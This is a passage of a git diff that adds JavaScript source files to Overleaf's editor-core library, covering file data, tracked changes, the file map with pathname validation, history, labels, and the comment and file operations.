b/libraries/overleaf-editor-core/lib/file_data/string_file_data.js @@ -0,0 +1,151 @@ +// @ts-check +'use strict' + +const assert = require('check-types').assert + +const FileData = require('./') +const CommentList = require('./comment_list') +const TrackedChangeList = require('./tracked_change_list') + +/** + * @import { StringFileRawData, RawFileData, BlobStore, CommentRawData } from "../types" + * @import { TrackedChangeRawData, RangesBlob } from "../types" + * @import EditOperation from "../operation/edit_operation" + */ + +class StringFileData extends FileData { + /** + * @param {string} content + * @param {CommentRawData[]} [rawComments] + * @param {TrackedChangeRawData[]} [rawTrackedChanges] + */ + constructor(content, rawComments = [], rawTrackedChanges = []) { + super() + assert.string(content) + this.content = content + this.comments = CommentList.fromRaw(rawComments) + this.trackedChanges = TrackedChangeList.fromRaw(rawTrackedChanges) + } + + /** + * @param {StringFileRawData} raw + * @returns {StringFileData} + */ + static fromRaw(raw) { + return new StringFileData( + raw.content, + raw.comments || [], + raw.trackedChanges || [] + ) + } + + /** + * @inheritdoc + * @returns {StringFileRawData} + */ + toRaw() { + /** @type StringFileRawData */ + const raw = { content: this.content } + + if (this.comments.length) { + raw.comments = this.comments.toRaw() + } + + if (this.trackedChanges.length) { + raw.trackedChanges = this.trackedChanges.toRaw() + } + + return raw + } + + /** @inheritdoc */ + isEditable() { + return true + } + + /** + * @inheritdoc + * @param {import('../file').FileGetContentOptions} [opts] + */ + getContent(opts = {}) { + let content = '' + let cursor = 0 + if (opts.filterTrackedDeletes) { + for (const tc of this.trackedChanges.asSorted()) { + if (tc.tracking.type !== 'delete') { + continue + } + if (cursor < tc.range.start) { + content += this.content.slice(cursor, tc.range.start) + } + // skip the tracked change + cursor = tc.range.end + } + } + if (cursor < this.content.length) { + content += this.content.slice(cursor) + } + return content + } + + /** @inheritdoc */ + getByteLength() { + return Buffer.byteLength(this.content) + } + + /** @inheritdoc */ + getStringLength() { + return this.content.length + } + + /** + * @inheritdoc + * @param {EditOperation} operation */ + edit(operation) { + operation.apply(this) + } + + /** @inheritdoc */ + getComments() { + return this.comments + } + + /** @inheritdoc */ + getTrackedChanges() { + return this.trackedChanges + } + + /** + * @inheritdoc + * @returns {Promise} + */ + async toEager() { + return this + } + + /** @inheritdoc */ + async toHollow() { + return FileData.createHollow(this.getByteLength(), this.getStringLength()) + } + + /** + * @inheritdoc + * @param {BlobStore} blobStore + * @return {Promise} + */ + async store(blobStore) { + const blob = await blobStore.putString(this.content) + if (this.comments.comments.size || this.trackedChanges.length) { + /** @type {RangesBlob} */ + const ranges = { + comments: this.getComments().toRaw(), + trackedChanges: this.trackedChanges.toRaw(), + } + const rangesBlob = await blobStore.putObject(ranges) + return { hash: blob.getHash(), rangesHash: rangesBlob.getHash() } + } + return { hash: blob.getHash() } + } +} + +module.exports = StringFileData diff --git a/libraries/overleaf-editor-core/lib/file_data/tracked_change.js b/libraries/overleaf-editor-core/lib/file_data/tracked_change.js new file mode 100644 index 0000000..d0e6517 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/tracked_change.js @@ -0,0 +1,89 @@ +// @ts-check +const Range = require('../range') +const TrackingProps = require('./tracking_props') + +/** + * @import { TrackedChangeRawData } from "../types" + */ + +class TrackedChange { + /** + * @param {Range} range + * @param {TrackingProps} tracking + */ + constructor(range, tracking) { + /** + * @readonly + * @type {Range} + */ + this.range = range + /** + * @readonly + * @type {TrackingProps} + */ + this.tracking = tracking + } + + /** + * + * @param {TrackedChangeRawData} raw + * @returns {TrackedChange} + */ + static fromRaw(raw) { + return new TrackedChange( + Range.fromRaw(raw.range), + TrackingProps.fromRaw(raw.tracking) + ) + } + + /** + * @returns {TrackedChangeRawData} + */ + toRaw() { + return { + range: this.range.toRaw(), + tracking: this.tracking.toRaw(), + } + } + + /** + * Checks whether the tracked change can be merged with another + * @param {TrackedChange} other + * @returns {boolean} + */ + canMerge(other) { + if (!(other instanceof TrackedChange)) { + return false + } + return ( + this.tracking.type === other.tracking.type && + this.tracking.userId === other.tracking.userId && + this.range.touches(other.range) && + this.range.canMerge(other.range) + ) + } + + /** + * Merges another tracked change into this, updating the range and tracking + * timestamp + * @param {TrackedChange} other + * @returns {TrackedChange} + */ + merge(other) { + if (!this.canMerge(other)) { + throw new Error('Cannot merge tracked changes') + } + return new TrackedChange( + this.range.merge(other.range), + new TrackingProps( + this.tracking.type, + this.tracking.userId, + this.tracking.ts.getTime() > other.tracking.ts.getTime() + ? this.tracking.ts + : other.tracking.ts + ) + ) + } +} + +module.exports = TrackedChange diff --git a/libraries/overleaf-editor-core/lib/file_data/tracked_change_list.js b/libraries/overleaf-editor-core/lib/file_data/tracked_change_list.js new file mode 100644 index 0000000..263b37a --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/tracked_change_list.js @@ -0,0 +1,276 @@ +// @ts-check +const Range = require('../range') +const TrackedChange = require('./tracked_change') +const TrackingProps = require('../file_data/tracking_props') + +/** + * @import { TrackingDirective, TrackedChangeRawData } from "../types" + */ + +class TrackedChangeList { + /** + * + * @param {TrackedChange[]} trackedChanges + */ + constructor(trackedChanges) { + /** + * @type {TrackedChange[]} + */ + this._trackedChanges = trackedChanges + } + + /** + * + * @param {TrackedChangeRawData[]} raw + * @returns {TrackedChangeList} + */ + static fromRaw(raw) { + return new TrackedChangeList(raw.map(TrackedChange.fromRaw)) + } + + /** + * Converts the tracked changes to a raw object + * @returns {TrackedChangeRawData[]} + */ + toRaw() { + return this._trackedChanges.map(change => change.toRaw()) + } + + get length() { + return this._trackedChanges.length + } + + /** + * @returns {readonly TrackedChange[]} + */ + asSorted() { + // NOTE: Once all code dependent on this is typed, we can just return + // _trackedChanges. + return Array.from(this._trackedChanges) + } + + /** + * Returns the tracked changes that are fully included in the range + * @param {Range} range + * @returns {TrackedChange[]} + */ + inRange(range) { + return this._trackedChanges.filter(change => range.contains(change.range)) + } + + /** + * Returns the tracking props for a given range. + * @param {Range} range + * @returns {TrackingProps | undefined} + */ + propsAtRange(range) { + return this._trackedChanges.find(change => change.range.contains(range)) + ?.tracking + } + + /** + * Removes the tracked changes that are fully included in the range + * @param {Range} range + */ + removeInRange(range) { + this._trackedChanges = this._trackedChanges.filter( + change => !range.contains(change.range) + ) + } + + /** + * Adds a tracked change to the list + * @param {TrackedChange} trackedChange + */ + add(trackedChange) { + this._trackedChanges.push(trackedChange) + this._mergeRanges() + } + + /** + * Collapses consecutive (and compatible) ranges + * @returns {void} + */ + _mergeRanges() { + if (this._trackedChanges.length < 2) { + return + } + // ranges are non-overlapping so we can sort based on their first indices + this._trackedChanges.sort((a, b) => a.range.start - b.range.start) + const newTrackedChanges = [this._trackedChanges[0]] + for (let i = 1; i < this._trackedChanges.length; i++) { + const last = newTrackedChanges[newTrackedChanges.length - 1] + const current = this._trackedChanges[i] + if (last.range.overlaps(current.range)) { + throw new Error('Ranges cannot overlap') + } + if (current.range.isEmpty()) { + throw new Error('Tracked changes range cannot be empty') + } + if (last.canMerge(current)) { + newTrackedChanges[newTrackedChanges.length - 1] = last.merge(current) + } else { + newTrackedChanges.push(current) + } + } + this._trackedChanges = newTrackedChanges + } + + /** + * + * @param {number} cursor + * @param {string} insertedText + * @param {{tracking?: TrackingProps}} opts + */ + applyInsert(cursor, insertedText, opts = {}) { + const newTrackedChanges = [] + for (const trackedChange of this._trackedChanges) { + if ( + // If the cursor is before or at the insertion point, we need to move + // the tracked change + trackedChange.range.startIsAfter(cursor) || + cursor === trackedChange.range.start + ) { + newTrackedChanges.push( + new TrackedChange( + trackedChange.range.moveBy(insertedText.length), + trackedChange.tracking + ) + ) + } else if (cursor === trackedChange.range.end) { + // The insertion is at the end of the tracked change. So we don't need + // to move it. + newTrackedChanges.push(trackedChange) + } else if (trackedChange.range.containsCursor(cursor)) { + // If the tracked change is in the inserted text, we need to expand it + // split in three chunks. The middle one is added if it is a tracked insertion + const [firstRange, , thirdRange] = trackedChange.range.insertAt( + cursor, + insertedText.length + ) + const firstPart = new TrackedChange(firstRange, trackedChange.tracking) + if (!firstPart.range.isEmpty()) { + newTrackedChanges.push(firstPart) + } + // second part will be added at the end if it is a tracked insertion + const thirdPart = new TrackedChange(thirdRange, trackedChange.tracking) + if (!thirdPart.range.isEmpty()) { + newTrackedChanges.push(thirdPart) + } + } else { + newTrackedChanges.push(trackedChange) + } + } + + if (opts.tracking) { + // This is a new tracked change + const newTrackedChange = new TrackedChange( + new Range(cursor, insertedText.length), + opts.tracking + ) + newTrackedChanges.push(newTrackedChange) + } + this._trackedChanges = newTrackedChanges + this._mergeRanges() + } + + /** + * + * @param {number} cursor + * @param {number} length + */ + applyDelete(cursor, length) { + const newTrackedChanges = [] + for (const trackedChange of this._trackedChanges) { + const deletedRange = new Range(cursor, length) + // If the tracked change is after the deletion, we need to move it + if (deletedRange.contains(trackedChange.range)) { + continue + } else if (deletedRange.overlaps(trackedChange.range)) { + const newRange = trackedChange.range.subtract(deletedRange) + if (!newRange.isEmpty()) { + newTrackedChanges.push( + new TrackedChange(newRange, trackedChange.tracking) + ) + } + } else if (trackedChange.range.startIsAfter(cursor)) { + newTrackedChanges.push( + new TrackedChange( + trackedChange.range.moveBy(-length), + trackedChange.tracking + ) + ) + } else { + newTrackedChanges.push(trackedChange) + } + } + this._trackedChanges = newTrackedChanges + this._mergeRanges() + } + + /** + * @param {number} cursor + * @param {number} length + * @param {{tracking?: TrackingDirective}} opts + */ + applyRetain(cursor, length, opts = {}) { + // If there's no tracking info, leave everything as-is + if (!opts.tracking) { + return + } + const newTrackedChanges = [] + const retainedRange = new Range(cursor, length) + for (const trackedChange of this._trackedChanges) { + if (retainedRange.contains(trackedChange.range)) { + // Remove the range + } else if (retainedRange.overlaps(trackedChange.range)) { + if (trackedChange.range.contains(retainedRange)) { + const [leftRange, rightRange] = trackedChange.range.splitAt(cursor) + if (!leftRange.isEmpty()) { + newTrackedChanges.push( + new TrackedChange(leftRange, trackedChange.tracking) + ) + } + if (!rightRange.isEmpty() && rightRange.length > length) { + newTrackedChanges.push( + new TrackedChange( + rightRange.moveBy(length).shrinkBy(length), + trackedChange.tracking + ) + ) + } + } else if (retainedRange.start <= trackedChange.range.start) { + // overlaps to the left + const [, reducedRange] = trackedChange.range.splitAt( + retainedRange.end + ) + if (!reducedRange.isEmpty()) { + newTrackedChanges.push( + new TrackedChange(reducedRange, trackedChange.tracking) + ) + } + } else { + // overlaps to the right + const [reducedRange] = trackedChange.range.splitAt(cursor) + if (!reducedRange.isEmpty()) { + newTrackedChanges.push( + new TrackedChange(reducedRange, trackedChange.tracking) + ) + } + } + } else { + // keep the range + newTrackedChanges.push(trackedChange) + } + } + if (opts.tracking instanceof TrackingProps) { + // This is a new tracked change + const newTrackedChange = new TrackedChange(retainedRange, opts.tracking) + newTrackedChanges.push(newTrackedChange) + } + this._trackedChanges = newTrackedChanges + this._mergeRanges() + } +} + +module.exports = TrackedChangeList diff --git a/libraries/overleaf-editor-core/lib/file_data/tracking_props.js b/libraries/overleaf-editor-core/lib/file_data/tracking_props.js new file mode 100644 index 0000000..75ec95c --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_data/tracking_props.js @@ -0,0 +1,67 @@ +// @ts-check +/** + * @import { TrackingPropsRawData, TrackingDirective } from "../types" + */ + +class TrackingProps { + /** + * + * @param {'insert' | 'delete'} type + * @param {string} userId + * @param {Date} ts + */ + constructor(type, userId, ts) { + /** + * @readonly + * @type {'insert' | 'delete'} + */ + this.type = type + /** + * @readonly + * @type {string} + */ + this.userId = userId + /** + * @readonly + * @type {Date} + */ + this.ts = ts + } + + /** + * + * @param {TrackingPropsRawData} raw + * @returns {TrackingProps} + */ + static fromRaw(raw) { + return new TrackingProps(raw.type, raw.userId, new Date(raw.ts)) + } + + /** + * @returns {TrackingPropsRawData} + */ + toRaw() { + return { + type: this.type, + userId: this.userId, + ts: this.ts.toISOString(), + } + } + + /** + * @param {TrackingDirective} [other] + * @returns {boolean} + */ + equals(other) { + if (!(other instanceof TrackingProps)) { + return false + } + return ( + this.type === other.type && + this.userId === other.userId && + this.ts.getTime() === other.ts.getTime() + ) + } +} + +module.exports = TrackingProps diff --git a/libraries/overleaf-editor-core/lib/file_map.js b/libraries/overleaf-editor-core/lib/file_map.js new file mode 100644 index 0000000..4412319 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file_map.js @@ -0,0 +1,390 @@ +// @ts-check +'use strict' + +const _ = require('lodash') +const assert = require('check-types').assert +const OError = require('@overleaf/o-error') +const pMap = require('p-map') + +const File = require('./file') +const safePathname = require('./safe_pathname') + +/** + * @import { RawFile, RawFileMap } from './types' + * + * @typedef {Record} FileMapData + */ + +class PathnameError extends OError {} + +class NonUniquePathnameError extends PathnameError { + /** + * @param {string[]} pathnames + */ + constructor(pathnames) { + super('pathnames are not unique', { pathnames }) + this.pathnames = pathnames + } +} + +class BadPathnameError extends PathnameError { + /** + * @param {string} pathname + * @param {string} reason + */ + constructor(pathname, reason) { + if (pathname.length > 10) { + pathname = pathname.slice(0, 5) + '...' + pathname.slice(-5) + } + super('invalid pathname', { reason, pathname }) + this.pathname = pathname + } +} + +class PathnameConflictError extends PathnameError { + /** + * @param {string} pathname + */ + constructor(pathname) { + super('pathname conflicts with another file', { pathname }) + this.pathname = pathname + } +} + +class FileNotFoundError extends PathnameError { + /** + * @param {string} pathname + */ + constructor(pathname) { + super('file does not exist', { pathname }) + this.pathname = pathname + } +} + +/** + * A set of {@link File}s. Several properties are enforced on the pathnames: + * + * 1. File names and paths are case sensitive and can differ by case alone. This + * is consistent with most Linux file systems, but it is not consistent with + * Windows or OS X. Ideally, we would be case-preserving and case insensitive, + * like they are. And we used to be, but it caused too many incompatibilities + * with the old system, which was case sensitive. See + * https://github.com/overleaf/overleaf-ot-prototype/blob/ + * 19ed046c09f5a4d14fa12b3ea813ce0d977af88a/editor/core/lib/file_map.js + * for an implementation of this map with those properties. + * + * 2. Uniqueness: No two pathnames are the same. + * + * 3. No type conflicts: A pathname cannot refer to both a file and a directory + * within the same snapshot. That is, you can't have pathnames `a` and `a/b` in + * the same file map; {@see FileMap#wouldConflict}. + */ +class FileMap { + static PathnameError = PathnameError + static NonUniquePathnameError = NonUniquePathnameError + static BadPathnameError = BadPathnameError + static PathnameConflictError = PathnameConflictError + static FileNotFoundError = FileNotFoundError + + /** + * @param {Record} files + */ + constructor(files) { + // create bare object for use as Map + // http://ryanmorr.com/true-hash-maps-in-javascript/ + /** @type FileMapData */ + this.files = Object.create(null) + _.assign(this.files, files) + checkPathnamesAreUnique(this.files) + checkPathnamesDoNotConflict(this) + } + + /** + * @param {RawFileMap} raw + * @returns {FileMap} + */ + static fromRaw(raw) { + assert.object(raw, 'bad raw files') + return new FileMap(_.mapValues(raw, File.fromRaw)) + } + + /** + * Convert to raw object for serialization. + * + * @return {RawFileMap} + */ + toRaw() { + /** + * @param {File} file + * @return {RawFile} + */ + function fileToRaw(file) { + return file.toRaw() + } + // TODO(das7pad): refine types to enforce no nulls in FileMapData + // @ts-ignore + return _.mapValues(this.files, fileToRaw) + } + + /** + * Create the given file. + * + * @param {string} pathname + * @param {File} file + */ + addFile(pathname, file) { + checkPathname(pathname) + assert.object(file, 'bad file') + // TODO(das7pad): make ignoredPathname argument fully optional + // @ts-ignore + checkNewPathnameDoesNotConflict(this, pathname) + addFile(this.files, pathname, file) + } + + /** + * Remove the given file. + * + * @param {string} pathname + */ + removeFile(pathname) { + checkPathname(pathname) + + const key = findPathnameKey(this.files, pathname) + if (!key) { + throw new FileMap.FileNotFoundError(pathname) + } + delete this.files[key] + } + + /** + * Move or remove a file. If the origin file does not exist, or if the old + * and new paths are identical, this has no effect. + * + * @param {string} pathname + * @param {string} newPathname if a blank string, {@link FileMap#removeFile} + */ + moveFile(pathname, newPathname) { + if (pathname === newPathname) return + if (newPathname === '') return this.removeFile(pathname) + checkPathname(pathname) + checkPathname(newPathname) + checkNewPathnameDoesNotConflict(this, newPathname, pathname) + + const key = findPathnameKey(this.files, pathname) + if (!key) { + throw new FileMap.FileNotFoundError(pathname) + } + const file = this.files[key] + delete this.files[key] + + addFile(this.files, newPathname, file) + } + + /** + * The number of files in the file map. + * + * @return {number} + */ + countFiles() { + return _.size(this.files) + } + + /** + * Get a file by its pathname. + * + * @param {string} pathname + * @return {File | null | undefined} + */ + getFile(pathname) { + const key = findPathnameKey(this.files, pathname) + if (key) return this.files[key] + } + + /** + * Whether the given pathname conflicts with any file in the map. + * + * Paths conflict in type if one path is a strict prefix of the other path. For + * example, 'a/b' conflicts with 'a', because in the former case 'a' is a + * folder, but in the latter case it is a file. Similarly, the pathname 'a/b/c' + * conflicts with 'a' and 'a/b', but it does not conflict with 'a/b/c', 'a/x', + * or 'a/b/x'. (In our case, identical paths don't conflict, because AddFile + * and MoveFile overwrite existing files.) + * + * @param {string} pathname + * @param {string?} ignoredPathname pretend this pathname does not exist + */ + wouldConflict(pathname, ignoredPathname) { + checkPathname(pathname) + assert.maybe.string(ignoredPathname) + const pathnames = this.getPathnames() + const dirname = pathname + '/' + // Check the filemap to see whether the supplied pathname is a + // parent of any entry, or any entry is a parent of the pathname. + for (let i = 0; i < pathnames.length; i++) { + // First check if pathname is a strict prefix of pathnames[i] (and that + // pathnames[i] is not ignored) + if ( + pathnames[i].startsWith(dirname) && + !pathnamesEqual(pathnames[i], ignoredPathname) + ) { + return true + } + // Now make the reverse check, whether pathnames[i] is a strict prefix of + // pathname. To avoid expensive string concatenation on each pathname we + // first perform a partial check with a.startsWith(b), and then do the + // full check for a subsequent '/' if this passes. This saves about 25% + // of the runtime. Again only return a conflict if pathnames[i] is not + // ignored. + if ( + pathname.startsWith(pathnames[i]) && + pathname.length > pathnames[i].length && + pathname[pathnames[i].length] === '/' && + !pathnamesEqual(pathnames[i], ignoredPathname) + ) { + return true + } + } + // No conflicts - after excluding ignoredPathname, there were no entries + // which were a strict prefix of pathname, and pathname was not a strict + // prefix of any entry. + return false + } + + /** @see Snapshot#getFilePathnames */ + getPathnames() { + return _.keys(this.files) + } + + /** + * Map the files in this map to new values. + * @template T + * @param {(file: File | null, path: string) => T} iteratee + * @return {Record} + */ + map(iteratee) { + return _.mapValues(this.files, iteratee) + } + + /** + * Map the files in this map to new values asynchronously, with an optional + * limit on concurrency. + * @template T + * @param {(file: File | null | undefined, path: string, pathnames: string[]) => T} iteratee + * @param {number} [concurrency] + * @return {Promise>} + */ + async mapAsync(iteratee, concurrency) { + assert.maybe.number(concurrency, 'bad concurrency') + + const pathnames = this.getPathnames() + const files = await pMap( + pathnames, + file => { + return iteratee(this.getFile(file), file, pathnames) + }, + { concurrency: concurrency || 1 } + ) + return _.zipObject(pathnames, files) + } +} + +/** + * @param {string} pathname0 + * @param {string?} pathname1 + * @returns {boolean} + */ +function pathnamesEqual(pathname0, pathname1) { + return pathname0 === pathname1 +} + +/** + * @param {FileMapData} files + * @returns {boolean} + */ +function pathnamesAreUnique(files) { + const keys = _.keys(files) + return _.uniqWith(keys, pathnamesEqual).length === keys.length +} + +/** + * @param {FileMapData} files + */ +function checkPathnamesAreUnique(files) { + if (pathnamesAreUnique(files)) return + throw new FileMap.NonUniquePathnameError(_.keys(files)) +} + +/** + * @param {string} pathname + */ +function checkPathname(pathname) { + assert.nonEmptyString(pathname, 'bad pathname') + const [isClean, reason] = safePathname.isCleanDebug(pathname) + if (isClean) return + throw new FileMap.BadPathnameError(pathname, reason) +} + +/** + * @param {FileMap} fileMap + * @param {string} pathname + * @param {string?} ignoredPathname + */ +function checkNewPathnameDoesNotConflict(fileMap, pathname, ignoredPathname) { + if (fileMap.wouldConflict(pathname, ignoredPathname)) { + throw new FileMap.PathnameConflictError(pathname) + } +} + +/** + * @param {FileMap} fileMap + */ +function checkPathnamesDoNotConflict(fileMap) { + const pathnames = fileMap.getPathnames() + // check pathnames for validity first + pathnames.forEach(checkPathname) + // convert pathnames to candidate directory names + const dirnames = [] + for (let i = 0; i < pathnames.length; i++) { + dirnames[i] = pathnames[i] + '/' + } + // sort in lexical order and check if one directory contains another + dirnames.sort() + for (let i = 0; i < dirnames.length - 1; i++) { + if (dirnames[i + 1].startsWith(dirnames[i])) { + // strip trailing slash to get original pathname + const conflictPathname = dirnames[i + 1].substr(0, -1) + throw new FileMap.PathnameConflictError(conflictPathname) + } + } +} + +/** + * This function is somewhat vestigial: it was used when this map used + * case-insensitive pathname comparison. We could probably simplify some of the + * logic in the callers, but in the hope that we will one day return to + * case-insensitive semantics, we've just left things as-is for now. + * + * TODO(das7pad): In a followup, inline this function and make types stricter. + * + * @param {FileMapData} files + * @param {string} pathname + * @returns {string | undefined} + */ +function findPathnameKey(files, pathname) { + // we can check for the key without worrying about properties + // in the prototype because we are now using a bare object/ + if (pathname in files) return pathname +} + +/** + * @param {FileMapData} files + * @param {string} pathname + * @param {File?} file + */ +function addFile(files, pathname, file) { + const key = findPathnameKey(files, pathname) + if (key) delete files[key] + files[pathname] = file +} + +module.exports = FileMap diff --git a/libraries/overleaf-editor-core/lib/history.js b/libraries/overleaf-editor-core/lib/history.js new file mode 100644 index 0000000..d9d1253 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/history.js @@ -0,0 +1,135 @@ +'use strict' + +const assert = require('check-types').assert +const pMap = require('p-map') + +const Change = require('./change') +const Snapshot = require('./snapshot') + +/** + * @import { BlobStore } from "./types" + */ + +class History { + /** + * @constructor + * @param {Snapshot} snapshot + * @param {Array.} changes + * + * @classdesc + * A History is a {@link Snapshot} and a sequence of {@link Change}s that can + * be applied to produce a new snapshot. + */ + constructor(snapshot, changes) { + assert.instance(snapshot, Snapshot, 'bad snapshot') + assert.maybe.array.of.instance(changes, Change, 'bad changes') + + this.snapshot = snapshot + /** @type {Array} */ + this.changes = changes || [] + } + + static fromRaw(raw) { + return new History( + Snapshot.fromRaw(raw.snapshot), + raw.changes.map(Change.fromRaw) + ) + } + + toRaw() { + function changeToRaw(change) { + return change.toRaw() + } + return { + snapshot: this.snapshot.toRaw(), + changes: this.changes.map(changeToRaw), + } + } + + getSnapshot() { + return this.snapshot + } + + getChanges() { + return this.changes + } + + countChanges() { + return this.changes.length + } + + /** + * Add changes to this history. + * + * @param {Array.} changes + */ + pushChanges(changes) { + this.changes.push.apply(this.changes, changes) + } + + /** + * If this History references blob hashes, either in the Snapshot or the + * Changes, add them to the given set. + * + * @param {Set.} blobHashes + */ + findBlobHashes(blobHashes) { + function findChangeBlobHashes(change) { + change.findBlobHashes(blobHashes) + } + this.snapshot.findBlobHashes(blobHashes) + this.changes.forEach(findChangeBlobHashes) + } + + /** + * If this History contains any File objects, load them. + * + * @param {string} kind see {File#load} + * @param {BlobStore} blobStore + * @return {Promise} + */ + async loadFiles(kind, blobStore) { + async function loadChangeFiles(changes) { + for (const change of changes) { + await change.loadFiles(kind, blobStore) + } + } + + await Promise.all([ + this.snapshot.loadFiles(kind, blobStore), + loadChangeFiles(this.changes), + ]) + } + + /** + * Return a version of this history that is suitable for long term storage. + * This requires that we store the content of file objects in the provided + * blobStore. + * + * @param {BlobStore} blobStore + * @param {number} [concurrency] applies separately to files, changes and + * operations + * @return {Promise} + */ + async store(blobStore, concurrency) { + assert.maybe.number(concurrency, 'bad concurrency') + + /** + * @param {Change} change + */ + async function storeChange(change) { + return await change.store(blobStore, concurrency) + } + + const [rawSnapshot, rawChanges] = await Promise.all([ + this.snapshot.store(blobStore, concurrency), + pMap(this.changes, storeChange, { concurrency: concurrency || 1 }), + ]) + return { + snapshot: rawSnapshot, + changes: rawChanges, + } + } +} + +module.exports = History diff --git a/libraries/overleaf-editor-core/lib/label.js b/libraries/overleaf-editor-core/lib/label.js new file mode 100644 index 0000000..958f758 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/label.js @@ -0,0 +1,99 @@ +// @ts-check +'use strict' + +const assert = require('check-types').assert + +/** + * @import { RawLabel } from './types' + */ + +/** + * @classdesc + * A user-configurable label that can be attached to a specific change. Labels + * are not versioned, and they are not stored alongside the Changes in Chunks. + * They are instead intended to provide external markers into the history of the + * project. + */ +class Label { + /** + * @constructor + * @param {string} text + * @param {number?} authorId + * @param {Date} timestamp + * @param {number} version + */ + constructor(text, authorId, timestamp, version) { + assert.string(text, 'bad text') + assert.maybe.integer(authorId, 'bad author id') + assert.date(timestamp, 'bad timestamp') + assert.integer(version, 'bad version') + + this.text = text + this.authorId = authorId + this.timestamp = timestamp + this.version = version + } + + /** + * Create a Label from its raw form. + * + * @param {RawLabel} raw + * @return {Label} + */ + static fromRaw(raw) { + return new Label( + raw.text, + raw.authorId, + new Date(raw.timestamp), + raw.version + ) + } + + /** + * Convert the Label to raw form for transmission. + * + * @return {RawLabel} + */ + toRaw() { + return { + text: this.text, + authorId: this.authorId, + timestamp: this.timestamp.toISOString(), + version: this.version, + } + } + + /** + * @return {string} + */ + getText() { + return this.text + } + + /** + * The ID of the author, if any. Note that we now require all saved versions to + * have an author, but this was not always the case, so we have to allow nulls + * here for historical reasons. + * + * @return {number | null | undefined} + */ + getAuthorId() { + return this.authorId + } + + /** + * @return {Date} + */ + getTimestamp() { + return this.timestamp + } + + /** + * @return {number} + */ + getVersion() { + return this.version + } +} + +module.exports = Label diff --git a/libraries/overleaf-editor-core/lib/operation/add_comment_operation.js b/libraries/overleaf-editor-core/lib/operation/add_comment_operation.js new file mode 100644 index 0000000..9165d42 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/add_comment_operation.js @@ -0,0 +1,150 @@ +// @ts-check +const core = require('../../index') +const Comment = require('../comment') +const Range = require('../range') +const EditOperation = require('./edit_operation') + +/** + * @import DeleteCommentOperation from './delete_comment_operation' + * @import { CommentRawData, RawAddCommentOperation } from '../types' + * @import StringFileData from '../file_data/string_file_data' + */ + +/** + * @extends EditOperation + */ +class AddCommentOperation extends EditOperation { + /** + * @param {string} commentId + * @param {ReadonlyArray} ranges + * @param {boolean} resolved + */ + constructor(commentId, ranges, resolved = false) { + super() + + for (const range of ranges) { + if (range.isEmpty()) { + throw new Error("AddCommentOperation can't be built with empty ranges") + } + } + + /** @readonly */ + this.commentId = commentId + + /** @readonly */ + this.ranges = ranges + + /** @readonly */ + this.resolved = resolved + } + + /** + * + * @returns {RawAddCommentOperation} + */ + toJSON() { + /** @type RawAddCommentOperation */ + const raw = { + commentId: this.commentId, + ranges: this.ranges.map(range => range.toRaw()), + } + if (this.resolved) { + raw.resolved = true + } + return raw + } + + /** + * @param {StringFileData} fileData + */ + apply(fileData) { + fileData.comments.add( + new Comment(this.commentId, this.ranges, this.resolved) + ) + } + + /** + * @inheritdoc + * @param {StringFileData} previousState + * @returns {EditOperation} + */ + invert(previousState) { + const comment = previousState.comments.getComment(this.commentId) + if (!comment) { + return new core.DeleteCommentOperation(this.commentId) + } + + return new core.AddCommentOperation( + comment.id, + comment.ranges.slice(), + comment.resolved + ) + } + + /** + * @inheritdoc + * @param {EditOperation} other + * @returns {boolean} + */ + canBeComposedWith(other) { + return ( + (other instanceof AddCommentOperation && + this.commentId === other.commentId) || + (other instanceof core.DeleteCommentOperation && + this.commentId === other.commentId) || + (other instanceof core.SetCommentStateOperation && + this.commentId === other.commentId) + ) + } + + /** + * @inheritdoc + * @param {EditOperation} other + * @returns {EditOperation} + */ + compose(other) { + if ( + other instanceof core.DeleteCommentOperation && + other.commentId === this.commentId + ) { + return other + } + + if ( + other instanceof AddCommentOperation && + other.commentId === this.commentId + ) { + return other + } + + if ( + other instanceof core.SetCommentStateOperation && + other.commentId === this.commentId + ) { + return new AddCommentOperation( + this.commentId, + this.ranges, + other.resolved + ) + } + + throw new Error( + `Trying to compose AddCommentOperation with ${other?.constructor?.name}.` + ) + } + + /** + * @inheritdoc + * @param {RawAddCommentOperation} raw + * @returns {AddCommentOperation} + */ + static fromJSON(raw) { + return new AddCommentOperation( + raw.commentId, + raw.ranges.map(Range.fromRaw), + raw.resolved ?? false + ) + } +} + +module.exports = AddCommentOperation diff --git a/libraries/overleaf-editor-core/lib/operation/add_file_operation.js b/libraries/overleaf-editor-core/lib/operation/add_file_operation.js new file mode 100644 index 0000000..8b4b014 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/add_file_operation.js @@ -0,0 +1,78 @@ +'use strict' + +const assert = require('check-types').assert + +const File = require('../file') +const Operation = require('./') + +/** + * Adds a new file to a project. + */ +class AddFileOperation extends Operation { + /** + * @param {string} pathname + * @param {File} file + */ + constructor(pathname, file) { + super() + assert.string(pathname, 'bad pathname') + assert.object(file, 'bad file') + + this.pathname = pathname + this.file = file + } + + /** + * @return {String} + */ + getPathname() { + return this.pathname + } + + /** + * TODO + * @param {Object} raw + * @return {AddFileOperation} + */ + static fromRaw(raw) { + return new AddFileOperation(raw.pathname, File.fromRaw(raw.file)) + } + + /** + * @inheritdoc + */ + toRaw() { + return { pathname: this.pathname, file: this.file.toRaw() } + } + + /** + * @inheritdoc + */ + getFile() { + return this.file + } + + /** @inheritdoc */ + findBlobHashes(blobHashes) { + const hash = this.file.getHash() + if (hash) blobHashes.add(hash) + } + + /** @inheritdoc */ + async loadFiles(kind, blobStore) { + return await this.file.load(kind, blobStore) + } + + async store(blobStore) { + const rawFile = await this.file.store(blobStore) + return { pathname: this.pathname, file: rawFile } + } + + /** + * @inheritdoc + */ + applyTo(snapshot) { + snapshot.addFile(this.pathname, this.file.clone()) + } +} +module.exports = AddFileOperation diff --git a/libraries/overleaf-editor-core/lib/operation/delete_comment_operation.js b/libraries/overleaf-editor-core/lib/operation/delete_comment_operation.js new file mode 100644 index 0000000..4f4a457 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/delete_comment_operation.js @@ -0,0 +1,70 @@ +// @ts-check +const core = require('../../index') +const EditNoOperation = require('./edit_no_operation') +const EditOperation = require('./edit_operation') + +/** + * @import AddCommentOperation from './add_comment_operation' + * @import 